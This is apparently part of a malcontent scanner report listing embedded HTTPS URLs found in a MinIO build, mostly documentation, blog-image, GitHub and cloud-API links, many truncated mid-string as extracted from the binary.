[https://github.com/woolfg](https://github.com/woolfg)
[https://mermaid.live/edit](https://mermaid.live/edit)
[https://minio.example.com](https://minio.example.com)
[https://subnet.min.iohttp](https://subnet.min.iohttp)
[https://bugzil.la/875615](https://bugzil.la/875615)
[https://dr.minio-storage](https://dr.minio-storage)
[https://github.com/lifof](https://github.com/lifof)
[https://iamcredentials..](https://iamcredentials..)
[https://warm-minio-1.com](https://warm-minio-1.com)
[https://warm-minio-2.com](https://warm-minio-2.com)
[https://bit.ly/CRA-PWA.](https://bit.ly/CRA-PWA.)
[https://min.io/?ref=con](https://min.io/?ref=con)
[https://notify.endpoint](https://notify.endpoint)
[https://polyfill.io/v3/](https://polyfill.io/v3/)
[https://bit.ly/3cXEKWf](https://bit.ly/3cXEKWf)
[https://min.io/signup.](https://min.io/signup.)
[https://s-c.sh/2BAXzed](https://s-c.sh/2BAXzed)
[https://warm-minio.com](https://warm-minio.com)
[https://vecta.io/nano](https://vecta.io/nano)
[https://git.io/JUIaE](https://git.io/JUIaE)
[https://mdn.io/isNaN](https://mdn.io/isNaN)
[https://www.fsf.org/](https://www.fsf.org/)
[https://example.com](https://example.com)
[https://hertzen.com](https://hertzen.com)
[https://feross.org](https://feross.org)
[https://sts.reset](https://sts.reset) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://IsLatestPrefixesUploadIDMaxPartsUserTagsIf-Matchprofileris-groupl](https%3A%2F%2FIsLatestPrefixesUploadIDMaxPartsUserTagsIf-Matchprofileris-groupl)
[https://api.loganalytics.usservicebus.chinacloudapi.cndocuments.microsoft](https%3A%2F%2Fapi.loganalytics.usservicebus.chinacloudapi.cndocuments.microsoft)
[https://batch.cloudapi.de/mysql.database.cloudapi.decloudapp.microsoftazu](https%3A%2F%2Fbatch.cloudapi.de%2Fmysql.database.cloudapi.decloudapp.microsoftazu)
[https://blog.min.io/cohasset-associates-assessment-for-object-locking-on-](https%3A%2F%2Fblog.min.io%2Fcohasset-associates-assessment-for-object-locking-on-)
[https://blog.min.io/content/images/size/w1000/2020/12/pay_banner-01-01-01](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw1000%2F2020%2F12%2Fpay_banner-01-01-01)
[https://blog.min.io/content/images/size/w1000/2021/04/Screenshot-at-Apr-0](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw1000%2F2021%2F04%2FScreenshot-at-Apr-0)
[https://blog.min.io/content/images/size/w1000/2021/09/denys-nevozhai-7nrs](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw1000%2F2021%2F09%2Fdenys-nevozhai-7nrs)
[https://blog.min.io/content/images/size/w1000/2022/08/Supportability-blog](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw1000%2F2022%2F08%2FSupportability-blog)
[https://blog.min.io/content/images/size/w1000/2022/09/Screen-Shot-2022-09](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw1000%2F2022%2F09%2FScreen-Shot-2022-09)
[https://blog.min.io/content/images/size/w1000/2022/12/Screen-Shot-2022-12](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw1000%2F2022%2F12%2FScreen-Shot-2022-12)
[https://blog.min.io/content/images/size/w1000/2022/12/replication-bestpra](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw1000%2F2022%2F12%2Freplication-bestpra)
[https://blog.min.io/content/images/size/w1000/2023/02/Understanding-the-M](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw1000%2F2023%2F02%2FUnderstanding-the-M)
[https://blog.min.io/content/images/size/w1000/2023/03/SUBNET-Healthcheck-](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw1000%2F2023%2F03%2FSUBNET-Healthcheck-)
[https://blog.min.io/content/images/size/w1000/2023/03/SUBNET-call-home.jp](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw1000%2F2023%2F03%2FSUBNET-call-home.jp)
[https://blog.min.io/content/images/size/w1000/2023/03/faststreaming-03.jp](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw1000%2F2023%2F03%2Ffaststreaming-03.jp)
[https://blog.min.io/content/images/size/w1000/2023/04/PXL_20230417_154022](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw1000%2F2023%2F04%2FPXL_20230417_154022)
[https://blog.min.io/content/images/size/w1000/2023/04/Screen-Shot-2023-04](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw1000%2F2023%2F04%2FScreen-Shot-2023-04)
[https://blog.min.io/content/images/size/w2000/2019/05/Screenshot-at-May-1](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2019%2F05%2FScreenshot-at-May-1)
[https://blog.min.io/content/images/size/w2000/2020/07/1920px-Immeuble_du_](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2020%2F07%2F1920px-Immeuble_du_)
[https://blog.min.io/content/images/size/w2000/2021/07/pexels-shockphoto-b](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2021%2F07%2Fpexels-shockphoto-b)
[https://blog.min.io/content/images/size/w2000/2021/09/1_kqpVTzo8b0e2oKdOj](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2021%2F09%2F1_kqpVTzo8b0e2oKdOj)
[https://blog.min.io/content/images/size/w2000/2021/09/denys-nevozhai-7nrs](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2021%2F09%2Fdenys-nevozhai-7nrs)
[https://blog.min.io/content/images/size/w2000/2021/11/josh-rose-trYl7JYAT](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2021%2F11%2Fjosh-rose-trYl7JYAT)
[https://blog.min.io/content/images/size/w2000/2022/06/pexels-pixabay-2101](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2022%2F06%2Fpexels-pixabay-2101)
[https://blog.min.io/content/images/size/w2000/2022/08/minioKafka-bloghead](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2022%2F08%2FminioKafka-bloghead)
[https://blog.min.io/content/images/size/w2000/2023/09/active-active-email](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2023%2F09%2Factive-active-email)
[https://blog.min.io/content/images/size/w2000/2023/10/Screen-Shot-2023-10](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2023%2F10%2FScreen-Shot-2023-10)
[https://blog.min.io/content/images/size/w2000/2023/11/Regulatory-Complian](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2023%2F11%2FRegulatory-Complian)
[https://blog.min.io/content/images/size/w2000/2023/11/eventnotifications-](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2023%2F11%2Feventnotifications-)
[https://blog.min.io/content/images/size/w2000/2024/01/blog-header-How-to-](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2024%2F01%2Fblog-header-How-to-)
[https://blog.min.io/content/images/size/w2000/2024/01/blog-header-how-do-](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2024%2F01%2Fblog-header-how-do-)
[https://blog.min.io/minio-multi-cloud-object-storage-available-on-aws-mar](https%3A%2F%2Fblog.min.io%2Fminio-multi-cloud-object-storage-available-on-aws-mar)
[https://cloud.githubusercontent.com/assets/7957859/21814330/a17d556a-d761](https%3A%2F%2Fcloud.githubusercontent.com%2Fassets%2F7957859%2F21814330%2Fa17d556a-d761)
[https://connect.microsoft.com/IE/feedback/details/837245/xmlhttprequest-u](https%3A%2F%2Fconnect.microsoft.com%2FIE%2Ffeedback%2Fdetails%2F837245%2Fxmlhttprequest-u)
[https://database.usgovcloudapi.net/cloud.google.com/go/storage.ACL.Setclo](https%3A%2F%2Fdatabase.usgovcloudapi.net%2Fcloud.google.com%2Fgo%2Fstorage.ACL.Setclo)
[https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Object](https%3A%2F%2Fdeveloper.mozilla.org%2Fdocs%2FWeb%2FJavaScript%2FReference%2FGlobal_Object)
[https://developer.mozilla.org/en-US/docs/Web/API/FileSystemDirectoryEntry](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FFileSystemDirectoryEntry)
[https://developer.mozilla.org/en-US/docs/Web/API/FileSystemDirectoryReade](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FFileSystemDirectoryReade)
[https://developer.mozilla.org/en-US/docs/Web/API/HTMLInputElement/webkitd](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FHTMLInputElement%2Fwebkitd)
[https://developer.mozilla.org/en-US/docs/Web/API/HTML_Drag_and_Drop_API/R](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FHTML_Drag_and_Drop_API%2FR)
[https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/getModifie](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FKeyboardEvent%2FgetModifie)
[https://developer.mozilla.org/en-US/docs/Web/API/window/showOpenFilePicke](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2Fwindow%2FshowOpenFilePicke)
[https://developer.mozilla.org/en-US/docs/Web/Accessibility/Understanding_](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAccessibility%2FUnderstanding_)
[https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_typ](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FHTTP%2FBasics_of_HTTP%2FMIME_typ)
[https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FJavaScript%2FReference%2FGlobal_)
[https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Obj](https%3A%2F%2Fdeveloper.mozilla.org%2Fen%2Fdocs%2FWeb%2FJavaScript%2FReference%2FGlobal_Obj)
[https://dl.min.io/client/mc/release/linux-amd64/archive/mc.build/static/m](https%3A%2F%2Fdl.min.io%2Fclient%2Fmc%2Frelease%2Flinux-amd64%2Farchive%2Fmc.build%2Fstatic%2Fm)
[https://dl.min.io/server/minio/release/X-Minio-Replication-Encrypted-Mult](https%3A%2F%2Fdl.min.io%2Fserver%2Fminio%2Frelease%2FX-Minio-Replication-Encrypted-Mult)
[https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mg](https%3A%2F%2Fdocs.aws.amazon.com%2FAmazonS3%2Flatest%2Fuserguide%2Fobject-lifecycle-mg)
[https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_eleme](https%3A%2F%2Fdocs.aws.amazon.com%2FIAM%2Flatest%2FUserGuide%2Freference_policies_eleme)
[https://docs.microsoft.com/en-us/rest/api/storageservices/constructing-a-](https%3A%2F%2Fdocs.microsoft.com%2Fen-us%2Frest%2Fapi%2Fstorageservices%2Fconstructing-a-)
[https://gallery.cloudapi.de/mariadb.database.cloudapi.dex-goog-encryption](https%3A%2F%2Fgallery.cloudapi.de%2Fmariadb.database.cloudapi.dex-goog-encryption)
[https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.netdev.a](https%3A%2F%2Fgallery.usgovcloudapi.net%2Fmariadb.database.usgovcloudapi.netdev.a)
[https://github.com/DefinitelyTyped/DefinitelyTyped/blob/90a4ec8/types/nod](https%3A%2F%2Fgithub.com%2FDefinitelyTyped%2FDefinitelyTyped%2Fblob%2F90a4ec8%2Ftypes%2Fnod)
[https://github.com/HTTPArchive/wappalyzer/blob/main/src/technologies/r.js](https%3A%2F%2Fgithub.com%2FHTTPArchive%2Fwappalyzer%2Fblob%2Fmain%2Fsrc%2Ftechnologies%2Fr.js)
[https://github.com/ReactiveX/rxjs/blob/6fafcf53dc9e557439b25debaeadfd224b](https%3A%2F%2Fgithub.com%2FReactiveX%2Frxjs%2Fblob%2F6fafcf53dc9e557439b25debaeadfd224b)
[https://github.com/Rob--W/open-in-browser/blob/7e2e35a38b8b4e981b11da7b2f](https%3A%2F%2Fgithub.com%2FRob--W%2Fopen-in-browser%2Fblob%2F7e2e35a38b8b4e981b11da7b2f)
[https://github.com/adobe-webplatform/Snap.svg/blob/b365287722a72526000ac4](https%3A%2F%2Fgithub.com%2Fadobe-webplatform%2FSnap.svg%2Fblob%2Fb365287722a72526000ac4)
[https://github.com/facebook/fbjs/blob/c69904a511b900266935168223063dd8772](https%3A%2F%2Fgithub.com%2Ffacebook%2Ffbjs%2Fblob%2Fc69904a511b900266935168223063dd8772)
[https://github.com/facebook/fbjs/blob/master/packages/fbjs/src/core/hyphe](https%3A%2F%2Fgithub.com%2Ffacebook%2Ffbjs%2Fblob%2Fmaster%2Fpackages%2Ffbjs%2Fsrc%2Fcore%2Fhyphe)
[https://github.com/facebook/react/blob/a8a4742f1c54493df00da648a3f9d26e3d](https%3A%2F%2Fgithub.com%2Ffacebook%2Freact%2Fblob%2Fa8a4742f1c54493df00da648a3f9d26e3d)
[https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb2](https%3A%2F%2Fgithub.com%2Ffacebook%2Freact%2Fblob%2Fb87aabdfe1b7461e7331abb3601d9e6bb2)
[https://github.com/facebook/react/blob/master/packages/shared/formatProdE](https%3A%2F%2Fgithub.com%2Ffacebook%2Freact%2Fblob%2Fmaster%2Fpackages%2Fshared%2FformatProdE)
[https://github.com/facebook/react/commit/977357765b44af8ff0cfea3278668610](https%3A%2F%2Fgithub.com%2Ffacebook%2Freact%2Fcommit%2F977357765b44af8ff0cfea3278668610)
[https://github.com/go-sql-driver/mysql/wiki/strict-modeWithClientCertSour](https%3A%2F%2Fgithub.com%2Fgo-sql-driver%2Fmysql%2Fwiki%2Fstrict-modeWithClientCertSour)
[https://github.com/libuv/libuv/commit/02e1ebd40b807be5af46343ea873331b2ee](https%3A%2F%2Fgithub.com%2Flibuv%2Flibuv%2Fcommit%2F02e1ebd40b807be5af46343ea873331b2ee)
[https://github.com/moment/moment/blob/000ac1800e620f770f4eb31b5ae908f6167](https%3A%2F%2Fgithub.com%2Fmoment%2Fmoment%2Fblob%2F000ac1800e620f770f4eb31b5ae908f6167)
[https://github.com/mozilla/pdf.js/blob/d9fac3459609a807be6506fb3441b5da4b](https%3A%2F%2Fgithub.com%2Fmozilla%2Fpdf.js%2Fblob%2Fd9fac3459609a807be6506fb3441b5da4b)
[https://github.com/reactjs/react-transition-group/blob/13435f897b3ab71f6e](https%3A%2F%2Fgithub.com%2Freactjs%2Freact-transition-group%2Fblob%2F13435f897b3ab71f6e)
[https://github.com/reduxjs/redux-toolkit/blob/e85eb17b39a2118d859f7b7746e](https%3A%2F%2Fgithub.com%2Freduxjs%2Fredux-toolkit%2Fblob%2Fe85eb17b39a2118d859f7b7746e)
[https://github.com/syntax-tree/mdast-util-definitions/blob/8290999/index.](https%3A%2F%2Fgithub.com%2Fsyntax-tree%2Fmdast-util-definitions%2Fblob%2F8290999%2Findex.)
[https://github.com/zalmoxisus/remotedev-serialize/blob/master/helpers/ind](https%3A%2F%2Fgithub.com%2Fzalmoxisus%2Fremotedev-serialize%2Fblob%2Fmaster%2Fhelpers%2Find)
[https://github.com/zalmoxisus/remotedev-serialize/blob/master/immutable/s](https%3A%2F%2Fgithub.com%2Fzalmoxisus%2Fremotedev-serialize%2Fblob%2Fmaster%2Fimmutable%2Fs)
[https://i.ytimg.com/vi/-PjTSwLB8ZA/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2F-PjTSwLB8ZA%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/0PgMxz0HauA/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2F0PgMxz0HauA%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/5fz3rE3wjGg/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2F5fz3rE3wjGg%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/5ptKrZzOs4c/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https%3A%2F%2Fi.ytimg.com%2Fvi%2F5ptKrZzOs4c%2Fhqdefault.jpg%3Fsqp%3D-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/89vnToCcoAw/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https%3A%2F%2Fi.ytimg.com%2Fvi%2F89vnToCcoAw%2Fhqdefault.jpg%3Fsqp%3D-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/A3vCDaFWNNs/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2FA3vCDaFWNNs%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/BLTlaOvVCSg/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https%3A%2F%2Fi.ytimg.com%2Fvi%2FBLTlaOvVCSg%2Fhqdefault.jpg%3Fsqp%3D-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/CrBjB7vbI7M/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https%3A%2F%2Fi.ytimg.com%2Fvi%2FCrBjB7vbI7M%2Fhqdefault.jpg%3Fsqp%3D-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/Exg2KsfzHzI/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2FExg2KsfzHzI%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/G4wQZEsIxcU/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https%3A%2F%2Fi.ytimg.com%2Fvi%2FG4wQZEsIxcU%2Fhqdefault.jpg%3Fsqp%3D-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/Hk9Z-sltUu8/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2FHk9Z-sltUu8%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/Iz8ChZ7FRrw/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https%3A%2F%2Fi.ytimg.com%2Fvi%2FIz8ChZ7FRrw%2Fhqdefault.jpg%3Fsqp%3D-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/KiWWVgfuulU/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https%3A%2F%2Fi.ytimg.com%2Fvi%2FKiWWVgfuulU%2Fhqdefault.jpg%3Fsqp%3D-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/Oix9iXndSUY/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2FOix9iXndSUY%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/QniHMNNmbfI/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https%3A%2F%2Fi.ytimg.com%2Fvi%2FQniHMNNmbfI%2Fhqdefault.jpg%3Fsqp%3D-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/UuxqnUgowyg/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2FUuxqnUgowyg%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/XGOiwV6Cbuk/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2FXGOiwV6Cbuk%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/bZsNxeuzmYc/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https%3A%2F%2Fi.ytimg.com%2Fvi%2FbZsNxeuzmYc%2Fhqdefault.jpg%3Fsqp%3D-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/dLSBuVG7Y3k/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2FdLSBuVG7Y3k%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/iCxcv4_j35M/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2FiCxcv4_j35M%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/nFUI2N5zH34/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2FnFUI2N5zH34%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/sJEFAVqoKr0/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https%3A%2F%2Fi.ytimg.com%2Fvi%2FsJEFAVqoKr0%2Fhqdefault.jpg%3Fsqp%3D-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/thNus-DL1u4/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2FthNus-DL1u4%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/vdHv9wfhu24/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https%3A%2F%2Fi.ytimg.com%2Fvi%2FvdHv9wfhu24%2Fhqdefault.jpg%3Fsqp%3D-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/z2bRoMrQxv0/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https%3A%2F%2Fi.ytimg.com%2Fvi%2Fz2bRoMrQxv0%2Fhqdefault.jpg%3Fsqp%3D-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/zqjsw4O2-4U/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https%3A%2F%2Fi.ytimg.com%2Fvi%2Fzqjsw4O2-4U%2Fhqdefault.jpg%3Fsqp%3D-oaymwEjCNACELwBSFry)
[https://images.unsplash.com/photo-1428660285748-340f4e33d608?crop=entropy](https%3A%2F%2Fimages.unsplash.com%2Fphoto-1428660285748-340f4e33d608%3Fcrop%3Dentropy)
[https://images.unsplash.com/photo-1522932753915-9ee97e43e3d9?crop=entropy](https%3A%2F%2Fimages.unsplash.com%2Fphoto-1522932753915-9ee97e43e3d9%3Fcrop%3Dentropy)
[https://images.unsplash.com/photo-1523961131990-5ea7c61b2107?crop=entropy](https%3A%2F%2Fimages.unsplash.com%2Fphoto-1523961131990-5ea7c61b2107%3Fcrop%3Dentropy)
[https://images.unsplash.com/photo-1531185907801-2771c11ab782?crop=entropy](https%3A%2F%2Fimages.unsplash.com%2Fphoto-1531185907801-2771c11ab782%3Fcrop%3Dentropy)
[https://images.unsplash.com/photo-1571907483086-3c0ea40cc16d?crop=entropy](https%3A%2F%2Fimages.unsplash.com%2Fphoto-1571907483086-3c0ea40cc16d%3Fcrop%3Dentropy)
[https://images.unsplash.com/photo-1597386601945-8980df52c3dc?crop=entropy](https%3A%2F%2Fimages.unsplash.com%2Fphoto-1597386601945-8980df52c3dc%3Fcrop%3Dentropy)
[https://images.unsplash.com/photo-1611783569248-a82ec2e72c67?crop=entropy](https%3A%2F%2Fimages.unsplash.com%2Fphoto-1611783569248-a82ec2e72c67%3Fcrop%3Dentropy)
[https://management.core.cloudapi.de/cloud.google.com/go/storage.ACL.Listu](https%3A%2F%2Fmanagement.core.cloudapi.de%2Fcloud.google.com%2Fgo%2Fstorage.ACL.Listu)
[https://min.io/docs/minio/kubernetes/upstream/administration/bucket-repli](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Fadministration%2Fbucket-repli)
[https://min.io/docs/minio/kubernetes/upstream/administration/console/mana](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Fadministration%2Fconsole%2Fmana)
[https://min.io/docs/minio/kubernetes/upstream/administration/identity-acc](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Fadministration%2Fidentity-acc)
[https://min.io/docs/minio/kubernetes/upstream/administration/minio-consol](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Fadministration%2Fminio-consol)
[https://min.io/docs/minio/kubernetes/upstream/administration/monitoring.h](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Fadministration%2Fmonitoring.h)
[https://min.io/docs/minio/kubernetes/upstream/administration/monitoring/b](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Fadministration%2Fmonitoring%2Fb)
[https://min.io/docs/minio/kubernetes/upstream/administration/object-manag](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Fadministration%2Fobject-manag)
[https://min.io/docs/minio/kubernetes/upstream/administration/server-side-](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Fadministration%2Fserver-side-)
[https://min.io/docs/minio/kubernetes/upstream/operations/concepts/erasure](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Foperations%2Fconcepts%2Ferasure)
[https://min.io/docs/minio/kubernetes/upstream/operations/external-iam.htm](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Foperations%2Fexternal-iam.htm)
[https://min.io/docs/minio/kubernetes/upstream/operations/external-iam/con](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Foperations%2Fexternal-iam%2Fcon)
[https://min.io/docs/minio/kubernetes/upstream/operations/install-deploy-m](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Foperations%2Finstall-deploy-m)
[https://min.io/docs/minio/kubernetes/upstream/operations/monitoring/metri](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Foperations%2Fmonitoring%2Fmetri)
[https://min.io/docs/minio/kubernetes/upstream/operations/monitoring/minio](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Foperations%2Fmonitoring%2Fminio)
[https://min.io/docs/minio/kubernetes/upstream/operations/troubleshooting.](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Foperations%2Ftroubleshooting.)
[https://min.io/docs/minio/kubernetes/upstream/operations/troubleshooting/](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Foperations%2Ftroubleshooting%2F)
[https://min.io/docs/minio/linux/administration/bucket-replication.html?re](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Fadministration%2Fbucket-replication.html%3Fre)
[https://min.io/docs/minio/linux/administration/console/security-and-acces](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Fadministration%2Fconsole%2Fsecurity-and-acces)
[https://min.io/docs/minio/linux/administration/console/subnet-registratio](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Fadministration%2Fconsole%2Fsubnet-registratio)
[https://min.io/docs/minio/linux/administration/identity-access-management](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Fadministration%2Fidentity-access-management)
[https://min.io/docs/minio/linux/administration/monitoring/bucket-notifica](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Fadministration%2Fmonitoring%2Fbucket-notifica)
[https://min.io/docs/minio/linux/administration/monitoring/publish-events-](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Fadministration%2Fmonitoring%2Fpublish-events-)
[https://min.io/docs/minio/linux/administration/object-management/object-l](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Fadministration%2Fobject-management%2Fobject-l)
[https://min.io/docs/minio/linux/developers/transforms-with-object-lambda.](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Fdevelopers%2Ftransforms-with-object-lambda.)
[https://min.io/docs/minio/linux/operations/concepts/erasure-coding.htmlfo](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Foperations%2Fconcepts%2Ferasure-coding.htmlfo)
